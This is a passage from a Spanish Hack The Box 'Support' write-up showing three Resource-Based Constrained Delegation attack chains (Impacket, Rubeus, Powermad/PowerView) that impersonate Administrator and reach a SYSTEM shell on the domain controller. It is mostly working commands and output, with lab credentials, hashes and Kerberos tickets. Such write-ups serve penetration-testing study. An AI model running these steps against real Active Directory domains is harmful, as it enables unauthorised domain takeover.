Paso 4) Ahora podemos usar el equipo controlado (ATTACKCOMPUTER$) para impersonar usuarios (como Administrator) hacia el equipo víctima (DC$) usando S4U2Proxy. El siguiente paso es solicitar un TGT con impersonación utilizando impacket-getTGT.
┌──(root㉿kali)-[/home/kali/Documents/HTB/SUPPORT]
└─# impacket-getTGT support.htb/ATTACKCOMPUTER\$ -p 'AttackPassword123' -dc-ip 10.10.11.174
/usr/local/lib/python3.13/dist-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.13.0.dev0+20250611.105641.0612d078 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in ATTACKCOMPUTER$.ccachePaso 5) Ahora vamos a configurar la variable de entorno KRB5CCNAME para que las herramientas que requieran de autenticación Kerberos (como impacket-psexec, evil-winrm, smbclient, etc.) utilicen el ticket Kerberos TGT, previamente generado y guardado en el archivo ATTACKCOMPUTER$.ccache. Este ticket TGT nos va a permitir obtener un TGS para impersonar al usuario Administrator. En otras palabras, es el paso que "inyecta" el ticket en el entorno para continuar el ataque sin volver a autenticarnos con contraseña o hash.
┌──(root㉿kali)-[/home/kali/Documents/HTB/SUPPORT]
└─# export KRB5CCNAME=$(pwd)/ATTACKCOMPUTER$.ccachePaso 6) Ahora vamos a solicitar un Ticket de Servicio (TGS) válido para acceder al SPN cifs/dc.support.htb pero impersonando al usuario Administrator. Lo hacemos usando la cuenta de equipo delegada (ATTACKCOMPUTER$) que controlamos nosotros, gracias a la delegación S4U2Proxy que configuramos previamente.
┌──(root㉿kali)-[/home/kali/Documents/HTB/SUPPORT]
└─# impacket-getST support.htb/ATTACKCOMPUTER$ -spn cifs/dc.support.htb -impersonate Administrator -dc-ip 10.10.11.174
/usr/local/lib/python3.13/dist-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.13.0.dev0+20250611.105641.0612d078 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Impersonating Administrator
/usr/share/doc/python3-impacket/examples/getST.py:380: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:477: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2self
/usr/share/doc/python3-impacket/examples/getST.py:607: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:659: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_dc.support.htb@SUPPORT.HTB.ccachePaso 7) Cargamos el ticket Kerberos (ccache) que obtuvimos con getST y que representa al usuario Administrator. Este ticket será usado automáticamente por cualquier herramienta compatible con Kerberos (como impacket-psexec), sin necesidad de ingresar contraseña ni hash. Es un paso esencial para simular que ya tenemos un "pase VIP" firmado por el KDC (Key Distribution Center).
┌──(root㉿kali)-[/home/kali/Documents/HTB/SUPPORT]
└─# export KRB5CCNAME=$(pwd)/Administrator@cifs_dc.support.htb@SUPPORT.HTB.ccachePaso 8) Utilizamos el ticket cargado en el paso anterior con impacket-psexec, luego este se conecta al Domain Controller (dc.support.htb) y nos abre una sesión remota como Administrator. No nos pide credenciales porque ya tenemos un TGS válido en el archivo .ccache
┌──(root㉿kali)-[/home/kali/Documents/HTB/SUPPORT]
└─# impacket-psexec -k -no-pass dc.support.htb
/usr/local/lib/python3.13/dist-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.13.0.dev0+20250611.105641.0612d078 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on dc.support.htb.....
[*] Found writable share ADMIN$
[*] Uploading file YobWUjGd.exe
[*] Opening SVCManager on dc.support.htb.....
[*] Creating service mUkx on dc.support.htb.....
[*] Starting service mUkx.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.859]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\systemSi trasladamos todo este procedimiento a un gráfico, observaríamos algo así
Resource-Based Constrained Delegation (RBCD) con Impacket y Rubeus
1) Creamos una cuenta de equipo controlada por nosotros con impacket-addcomputer: FAKE-COMP01$
┌──(root㉿kali)-[/home/kali/Documents/HTB/SUPPORT]
└─# impacket-addcomputer -computer-name 'FAKE-COMP01$' -computer-pass 'Password123' -dc-ip 10.10.11.174 'support.htb/support:Ironside47pleasure40Watchful'
/usr/local/lib/python3.13/dist-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.13.0.dev0+20250611.105641.0612d078 - Copyright Fortra, LLC and its affiliated companies
[*] Successfully added machine account FAKE-COMP01$ with password Password123.2) Nos conectamos a la cuenta support con EvilWinRM y cargamos el binario de Rubeus con upload (previamente este binario debe encontrarse en el directorio desde donde ejecutamos EvilWinRM, de lo contrario no se podrá cargar en el equipo de support). Luego verificamos que la cuenta FAKE-COMP01$ fue creada correctamente.
┌──(root㉿kali)-[/home/kali/Documents/HTB/SUPPORT]
└─# evil-winrm -i 10.10.11.174 -u 'support' -p 'Ironside47pleasure40Watchful'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\support\Documents> upload Rubeus.exe
Info: Uploading /home/kali/Documents/HTB/SUPPORT/Rubeus.exe to C:\Users\support\Documents\Rubeus.exe
Data: 370688 bytes of 370688 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\support\Documents> Get-ADComputer -Identity "FAKE-COMP01$"
DistinguishedName : CN=FAKE-COMP01,CN=Computers,DC=support,DC=htb
DNSHostName :
Enabled : True
Name : FAKE-COMP01
ObjectClass : computer
ObjectGUID : 6f49ae76-c3b7-49a6-b24a-81b757693354
SamAccountName : FAKE-COMP01$
SID : S-1-5-21-1677581083-3380853377-188903654-56043) Modificamos el atributo msDS-AllowedToActOnBehalfOfOtherIdentity del DC$, con impacket-rbcd, para permitir que FAKE-COMP01$ pueda impersonar otros usuarios. Hasta aca el procedimiento es similar al anterior.
┌──(root㉿kali)-[/home/kali/Documents/HTB/SUPPORT]
└─# impacket-rbcd -action write -delegate-from 'FAKE-COMP01$' -delegate-to 'DC$' -dc-ip 10.10.11.174 'support.htb/support:Ironside47pleasure40Watchful'
/usr/local/lib/python3.13/dist-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.13.0.dev0+20250611.105641.0612d078 - Copyright Fortra, LLC and its affiliated companies
[*] Accounts allowed to act on behalf of other identity:
[-] SID not found in LDAP: S-1-5-21-1677581083-3380853377-188903654-5601
[-] SID not found in LDAP: S-1-5-21-1677581083-3380853377-188903654-5602
[-] SID not found in LDAP: S-1-5-21-1677581083-3380853377-188903654-5603
[*] Delegation rights modified successfully!
[*] FAKE-COMP01$ can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[-] SID not found in LDAP: S-1-5-21-1677581083-3380853377-188903654-5601
[-] SID not found in LDAP: S-1-5-21-1677581083-3380853377-188903654-5602
[-] SID not found in LDAP: S-1-5-21-1677581083-3380853377-188903654-5603
[*] FAKE-COMP01$ (S-1-5-21-1677581083-3380853377-188903654-5604)4) Obtener el hash NTLM de FAKE-COMP01$. Generamos el hash NTLM (rc4_hmac) con Rubeus para utilizarlo en la solicitud de ticket TGT. Luego solicitamos un TGT para FAKE-COMP01$ que se nos imprimirá en base64, finalmente, mediante S4U2Proxy, vamos a impersonar al usuario Administrator. Solicitamos un TGS para Administrator hacia cifs/dc.support.htb y Rubeus lo inyecta directamente (/ptt).
*Evil-WinRM* PS C:\Users\support\Documents> .\Rubeus.exe hash /password:Password123 /user:FAKE-COMP01$ /domain:support.htb
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.6.4
[*] Action: Calculate Password Hash(es)
[*] Input password : Password123
[*] Input username : FAKE-COMP01$
[*] Input domain : support.htb
[*] Salt : SUPPORT.HTBhostfake-comp01.support.htb
[*] rc4_hmac : 58A478135A93AC3BF058A5EA0E8FDB71
[*] aes128_cts_hmac_sha1 : 06C1EABAD3A21C24DF384247BC85C540
[*] aes256_cts_hmac_sha1 : FF7BA224B544AA97002B2BEE94EADBA7855EF81A1E05B7EB33D4BCD55807FF53
[*] des_cbc_md5 : 5B045E854358687C
*Evil-WinRM* PS C:\Users\support\Documents> .\Rubeus.exe asktgt /user:FAKE-COMP01$ /rc4:58A478135A93AC3BF058A5EA0E8FDB71 /domain:support.htb /dc:dc.support.htb /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.6.4
[*] Action: Ask TGT
[*] Using rc4_hmac hash: 58A478135A93AC3BF058A5EA0E8FDB71
[*] Building AS-REQ (w/ preauth) for: 'support.htb\FAKE-COMP01$'
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIFhDCCBYCgAwIBBaEDAgEWooIEmDCCBJRhggSQMIIEjKADAgEFoQ0bC1NVUFBPUlQuSFRCoiAwHqADAgECoRcwFRsGa3JidGd0GwtzdXBwb3J0Lmh0YqOCBFIwggROoAMCARKhAwIBAqKCBEAEggQ8Rf17sfMJ64DvqbKmHmDapwaU0YiWyQni/xvnrTA2zzUHFIAU71zCcYh10fz14xAGaP5ffFcONKVaaw2bT1OGh89AcgFJL1tXDDwt76SdV6FUNEBy626UOWVUfgwDQUPeA5TTncvq9T930PkPrxPnsfPQEzo6+DrbEVBv2ei9XkSi6lS5WCgjvs7cERCJI0jxDygEUOQ2uzDnZ6408QtFCMFJml2a2vhYnaKqSa+4/HXTBSXxL79geI+iNkbfK8O85pABspsnlfA5Aw9q99nLl7px1fKwU32PlRijHBcZ5J13bgfHG3wIQWyldxmPWEfaCcgwjVZUIEooiNrWbY/fcOXKzEV+7kAO99TT3ZN2eoLrVNbCZaBmd/oFJhhbL5dWE1BebhsQWs8/q5PC74CKx0SPtcovWXqyrEjhASajnYYULlTIrJGu4zUUnkUufl+/8/2d0vzvKAshjnCJr5QjbaXh0GNlIAj6f50yHZBPkaBQ/1hldX0pufpeIuX1aIKbntj0vcCFfwL1iw6WndYSex1jcf3epVnYF6DY07gMsTKOzp8XPGXLQQjSPSlwfxLKM3QltpX4P2tn6NXl3hoMdJkw0alJ5jHIViRFhXtSrod3wZ1Wg2twN64Vjkh1eGh9vSuJwIb8AhVkmv4XPKySRCCpOuypCWM75w1Frp4KFqJs0lbTqaRE5X6oF3rjgTCVF6lRx/7KzgqU0uxUUnBKrpTQqbaHDx+qcBaJ41bb97kaDiQdpB5Yhz31mkrc6stCfQGZdlbPgOsULVjN0VbwkI8ImSS30jl4BLpQ9hIRPMULXzqZbzHjX7ycfT2z6tA6LzGWg55um6X5POfZWOYasX1CkvwjGR2HQdkKHU8CdePbmuiLta7eDGSxRk13ulmsYiNYmSxTVxPj9zK7sXFl+GAZpUqmD8Ne/U9cdvS+GZjqFAXeyGF2IMn/bWGOhTENOXnHt2ag5jQDmpLM0glt9hCmJtVdS0iYXjW8q7NpL9vMlDuwNkVAdeJSrrLS2QsQYCy7jTCj+qQIbQ5amjYtB4+uN0ZJ4W7Yl3+bypt3TRczs3rCAjJP/XNP+Ba1FEaFgv+mY0SSYQkFavelkhfMsPxPdrzFBMEtS5TFHHrrVnQEL746VBGgv35EYC8sjVULDh2bJkfj2eLX29oIba7mvnoj6VVnr7thS+HZ8V8qqMjrdtLJIqWd4G6AE10UXmjT8iVEE0E/iwrd76LzODrjuuf7GsGxdJQDuUEZGueBwv/nSe8JottL4u1FkREpssoOqCp0L1aAQymnoYe36SDl2SN0wxYuqShjcb+lwVNfIZT8rRrw4oXOypCOiG6UNXZxTdJksNBiNufvGxAYhui8fk3DAvQYyXVTDoPWE+9DKf7OR3XtnwJSgKHNWpOsBotiJs6ABZWC1gURsFs9XYFbYeM0lwrMiPWAgosnnaOB1zCB1KADAgEAooHMBIHJfYHGMIHDoIHAMIG9MIG6oBswGaADAgEXoRIEEM6erfST/ETLUiPPWVWuwuOhDRsLU1VQUE9SVC5IVEKiGTAXoAMCAQGhEDAOGwxGQUtFLUNPTVAwMSSjBwMFAEDhAAClERgPMjAyNTA2MjMwNjAxNTZaphEYDzIwMjUwNjIzMTYwMTU2WqcRGA8yMDI1MDYzMDA2MDE1NlqoDRsLU1VQUE9SVC5IVEKpIDAeoAMCAQKhFzAVGwZrcmJ0Z3QbC3N1cHBvcnQuaHRi
ServiceName : krbtgt/support.htb
ServiceRealm : SUPPORT.HTB
UserName : FAKE-COMP01$
UserRealm : SUPPORT.HTB
StartTime : 6/22/2025 11:01:56 PM
EndTime : 6/23/2025 9:01:56 AM
RenewTill : 6/29/2025 11:01:56 PM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : zp6t9JP8RMtSI89ZVa7C4w==
*Evil-WinRM* PS C:\Users\support\Documents> .\Rubeus.exe s4u /user:FAKE-COMP01$ /rc4:58A478135A93AC3BF058A5EA0E8FDB71 /impersonateuser:Administrator /msdsspn:cifs/dc.support.htb /domain:support.htb /dc:dc.support.htb /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.6.4
[*] Action: S4U
[*] Impersonating user 'Administrator' to target SPN 'cifs/dc.support.htb'
[*] Using domain controller: dc.support.htb (::1)
[*] Building S4U2proxy request for service: 'cifs/dc.support.htb'
[*] Sending S4U2proxy request
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/dc.support.htb':
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
MBYbBGNpZnMbDmRjLnN1cHBvcnQuaHRi
[+] Ticket successfully imported!5) Con el ultimo ticket (TGS) que generamos, lo copiamos y lo pasamos a un archivo en nuestro equipo atacante (ticket.kirbi.b64), para luego editarlo y eliminar la indentación y los saltos de línea del ticket.
┌──(root㉿kali)-[/home/kali/Documents/HTB/SUPPORT]
└─# nano ticket.kirbi.b64
┌──(root㉿kali)-[/home/kali/Documents/HTB/SUPPORT]
└─# cat ticket.kirbi.b64 | sed 's/^[[:space:]]*//' | tr -d '\n' > ticket_clean.b64 6) Decodificamos y convertimos este ticket .kirbi a formato .ccache . Luego exportamos el ticket como variable de entorno para permitir que nuestras tools compatibles con Kerberos lo utilicen automáticamente
┌──(root㉿kali)-[/home/kali/Documents/HTB/SUPPORT]
└─# base64 -d ticket_clean.b64 > ticket.kirbi
┌──(root㉿kali)-[/home/kali/Documents/HTB/SUPPORT]
└─# impacket-ticketConverter ticket.kirbi ticket.ccache
/usr/local/lib/python3.13/dist-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.13.0.dev0+20250611.105641.0612d078 - Copyright Fortra, LLC and its affiliated companies
[*] converting kirbi to ccache...
[+] done
┌──(root㉿kali)-[/home/kali/Documents/HTB/SUPPORT]
└─# export KRB5CCNAME=$(pwd)/ticket.ccache7) Finalmente accedemos como Administrator con impacket-psexec
┌──(root㉿kali)-[/home/kali/Documents/HTB/SUPPORT]
└─# impacket-psexec support.htb/administrator@dc.support.htb -k -no-pass
/usr/local/lib/python3.13/dist-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.13.0.dev0+20250611.105641.0612d078 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on dc.support.htb.....
[*] Found writable share ADMIN$
[*] Uploading file guRJpUAS.exe
[*] Opening SVCManager on dc.support.htb.....
[*] Creating service dahv on dc.support.htb.....
[*] Starting service dahv.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.859]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
Resource-Based Constrained Delegation (RBCD) con Impacket, Powermad y Powerview
1) Para esta última poc vamos a necesitar descargar los binarios de Powermad y Powerview en nuestro equipo
┌──(root㉿kali)-[/home/kali/Documents/HTB/SUPPORT]
└─# wget https://raw.githubusercontent.com/Kevin-Robertson/Powermad/refs/heads/master/Powermad.ps1
┌──(root㉿kali)-[/home/kali/Documents/HTB/SUPPORT]
└─# wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/refs/heads/master/Recon/PowerView.ps1 2) Una vez que tenemos los binarios vamos a conectarnos desde ese directorio a la cuenta support con EvilWinRM y luego cargaremos ambos scripts
┌──(root㉿kali)-[/home/kali/Documents/HTB/SUPPORT]
└─# evil-winrm -i 10.10.11.174 -u 'support' -p 'Ironside47pleasure40Watchful'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\support\Documents> upload Powermad.ps1
Info: Uploading /home/kali/Documents/HTB/SUPPORT/Powermad.ps1 to C:\Users\support\Documents\Powermad.ps1
Data: 180768 bytes of 180768 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\support\Documents> Import-Module .\Powermad.ps1
*Evil-WinRM* PS C:\Users\support\Documents> upload PowerView.ps1
Info: Uploading /home/kali/Documents/HTB/SUPPORT/PowerView.ps1 to C:\Users\support\Documents\PowerView.ps1
Data: 1027036 bytes of 1027036 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\support\Documents> Import-Module .\PowerView.ps13) Creamos una cuenta de equipo (machine account) con Powermad. Esto simula la incorporación de un equipo al dominio.
*Evil-WinRM* PS C:\Users\support\Documents> New-MachineAccount -MachineAccount SERVICEA -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
Verbose: [+] Domain Controller = dc.support.htb
Verbose: [+] Domain = support.htb
Verbose: [+] SAMAccountName = SERVICEA$
Verbose: [+] Distinguished Name = CN=SERVICEA,CN=Computers,DC=support,DC=htb
[+] Machine account SERVICEA added
*Evil-WinRM* PS C:\Users\support\Documents> $ComputerSid = Get-DomainComputer SERVICEA -Properties objectsid | Select -Expand objectsid
*Evil-WinRM* PS C:\Users\support\Documents> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$ComputerSid)"
*Evil-WinRM* PS C:\Users\support\Documents> $SDBytes = New-Object byte[] ($SD.BinaryLength)
*Evil-WinRM* PS C:\Users\support\Documents> $SD.GetBinaryForm($SDBytes, 0)
*Evil-WinRM* PS C:\Users\support\Documents> Get-DomainComputer dc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
*Evil-WinRM* PS C:\Users\support\Documents> Get-DomainComputer dc -Properties 'msds-allowedtoactonbehalfofotheridentity'
msds-allowedtoactonbehalfofotheridentity
----------------------------------------
{1, 0, 4, 128...}
*Evil-WinRM* PS C:\Users\support\Documents> Get-DomainComputer SERVICEA
pwdlastset : 6/23/2025 5:32:23 PM
logoncount : 1
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=SERVICEA,CN=Computers,DC=support,DC=htb
objectclass : {top, person, organizationalPerson, user...}
lastlogontimestamp : 6/23/2025 5:32:29 PM
name : SERVICEA
objectsid : S-1-5-21-1677581083-3380853377-188903654-5604
samaccountname : SERVICEA$
localpolicyflags : 0
codepage : 0
samaccounttype : MACHINE_ACCOUNT
accountexpires : NEVER
countrycode : 0
whenchanged : 6/24/2025 12:32:29 AM
instancetype : 4
usncreated : 86150
objectguid : 6bfefbb1-dd77-41dc-a80c-0a9f06b1ba26
lastlogon : 6/23/2025 5:32:29 PM
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=support,DC=htb
dscorepropagationdata : 1/1/1601 12:00:00 AM
serviceprincipalname : {RestrictedKrbHost/SERVICEA, HOST/SERVICEA, RestrictedKrbHost/SERVICEA.support.htb, HOST/SERVICEA.support.htb}
ms-ds-creatorsid : {1, 5, 0, 0...}
badpwdcount : 0
cn : SERVICEA
useraccountcontrol : WORKSTATION_TRUST_ACCOUNT
whencreated : 6/24/2025 12:32:23 AM
primarygroupid : 515
iscriticalsystemobject : False
usnchanged : 86153
dnshostname : SERVICEA.support.htb4) Ahora vamos a solicitar un TGS usando Impacket-getST (ataque S4U2Proxy). Desde Kali, usando la cuenta SERVICEA$, obtenemos un ticket de servicio para Administrator hacia cifs/dc.support.htb. Luego vamos a exportar el ticket Kerberos TGS para que lo use impacket-psexec
┌──(root㉿kali)-[/home/kali/Documents/HTB/SUPPORT]
└─# impacket-getST -spn cifs/dc.support.htb -impersonate Administrator -dc-ip 10.10.11.174 support.htb/SERVICEA$:123456
/usr/local/lib/python3.13/dist-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.13.0.dev0+20250611.105641.0612d078 - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for user
[*] Impersonating Administrator
/usr/share/doc/python3-impacket/examples/getST.py:380: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:477: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2self
/usr/share/doc/python3-impacket/examples/getST.py:607: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:659: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_dc.support.htb@SUPPORT.HTB.ccache
┌──(root㉿kali)-[/home/kali/Documents/HTB/SUPPORT]
└─# export KRB5CCNAME=$(pwd)/Administrator@cifs_dc.support.htb@SUPPORT.HTB.ccache 5) Por ultimo vamos a usar impacket-psexec con el ticket TGS inyectado para ejecutar comandos (RCE) como nt authority\system.
┌──(root㉿kali)-[/home/kali/Documents/HTB/SUPPORT]
└─# impacket-psexec -k dc.support.htb
/usr/local/lib/python3.13/dist-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.13.0.dev0+20250611.105641.0612d078 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on dc.support.htb.....
[*] Found writable share ADMIN$
[*] Uploading file ovlSVhOk.exe
[*] Opening SVCManager on dc.support.htb.....
[*] Creating service twpT on dc.support.htb.....
[*] Starting service twpT.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.859]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\systemLast updated